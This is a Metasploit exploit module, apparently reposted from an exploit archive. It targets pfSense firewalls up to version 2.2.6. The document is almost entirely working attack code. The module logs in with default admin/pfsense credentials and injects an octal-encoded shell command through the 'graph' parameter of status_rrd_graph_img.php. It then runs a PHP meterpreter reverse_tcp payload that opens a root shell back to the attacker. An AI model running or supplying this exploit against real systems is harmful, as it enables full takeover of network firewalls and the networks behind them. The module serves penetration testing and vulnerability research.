pfSense 2.1.3-RELEASE (amd64) Remote Command Execution
Posted on 29 December 2017
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super( update_info( info, 'Name' => 'pfSense authenticated graph status RCE', 'Description' => %q( pfSense, a free BSD based open source firewall distribution, version <= 2.2.6 contains a remote command execution vulnerability post authentication in the _rrd_graph_img.php page. The vulnerability occurs via the graph GET parameter. A non-administrative authenticated attacker can inject arbitrary operating system commands and execute them as the root user. Verified against 2.1.3. ), 'Author' => [ 'Security-Assessment.com', # discovery 'Milton Valencia (wetw0rk)', # metasploit module 'Jared Stephens (mvrk)', # python script ], 'References' => [ [ 'EDB', '39709' ], [ 'URL', 'http://www.security-assessment.com/files/documents/advisory/pfsenseAdvisory.pdf'] ], 'License' => MSF_LICENSE, 'Privileged' => true, 'DefaultOptions' => { 'SSL' => true, 'Encoder' => 'php/base64', 'PAYLOAD' => 'php/meterpreter/reverse_tcp', }, 'DisclosureDate' => 'Apr 18, 2016', 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [[ 'Automatic Target', { }]], 'DefaultTarget' => 0, ) ) register_options( [ OptString.new('USERNAME', [ true, 'User to login with', 'admin']), OptString.new('PASSWORD', [ false, 'Password to login with', 'pfsense']), Opt::RPORT(443) ], self.class ) end def login res = send_request_cgi( 'uri' => '/index.php', 'method' => 'GET' ) fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil? fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 200 /var csrfMagicToken = "(?<csrf>sid:[a-z0-9,;:]+)";/ =~ res.body fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine CSRF token") if csrf.nil? vprint_status("CSRF Token for login: #{csrf}") cookie = "PHPSESSID=#{res.get_cookies_parsed['PHPSESSID'][0]}; cookie_test=#{res.get_cookies_parsed['cookie_test'][0]};" res = send_request_cgi( 'uri' => '/index.php', 'method' => 'POST', 'headers' => { 'User-Agent' => 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0', 'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language' => 'en-US,en;q=0.5', 'Accept-Encoding' => 'gzip, deflate', 'Referer' => "https://#{rhost}/index.php", 'Cookie' => cookie, 'Connection' => 'close', 'Upgrade-Insecure-Requests' => '1', }, 'vars_post' => { '__csrf_magic' => csrf, 'usernamefld' => datastore['USERNAME'], 'passwordfld' => datastore['PASSWORD'], 'login' => 'Login' } ) unless res fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to authentication request") end if res.code == 302 print_status('Authentication successful continuing exploitation') return cookie else fail_with(Failure::UnexpectedReply, "#{peer} - Authentication Failed: #{datastore['USERNAME']}:#{datastore['PASSWORD']}") return nil end end def exploit begin cookie = login filename = Rex::Text.to_rand_case("PaasdnatEoomaBb") # generate the PHP meterpreter payload stager = "echo '<?php " stager << payload.encode stager << "?>' > #{filename}" # here we begin the encoding process to # convert the payload to octal! Ugly code # don't look complete_stage = "" for i in 0..(stager.length()-1) complete_stage << "\#{stager[i].ord.to_s(8)}" end print_status("Attempting to upload the initial payload as #{filename}") res = send_request_raw( 'uri' => "/status_rrd_graph_img.php?database=-throughput.rrd&graph=file|printf%20%27#{complete_stage}%27|sh|echo", 'method' => 'GET', 'headers' => { 'User-Agent' => 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0', 'Accept' => '*/*', 'Accept-Language' => 'en-US,en;q=0.5', 'Accept-Encoding' => 'gzip, deflate', 'Origin' => 'null', 'Cookie' => cookie, 'Connection' => 'close', } ) if res && res.code == 200 print_good("Triggering the vulnerability, root shell incoming...") else print_error("Failed upload the initial payload...") end res = send_request_cgi({ 'uri' => '/status_rrd_graph_img.php', 'method' => 'GET', 'headers' => { 'User-Agent' => 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0', 'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language' => 'en-US,en;q=0.5', 'Accept-Encoding' => 'gzip, deflate', 'Cookie' => cookie, 'Connection' => 'close', 'Upgrade-Insecure-Requests' => '1', }, 'vars_get' => { 'database' => '-throughput.rrd', 'graph' => "file|php #{filename}|echo #" } }) disconnect end end end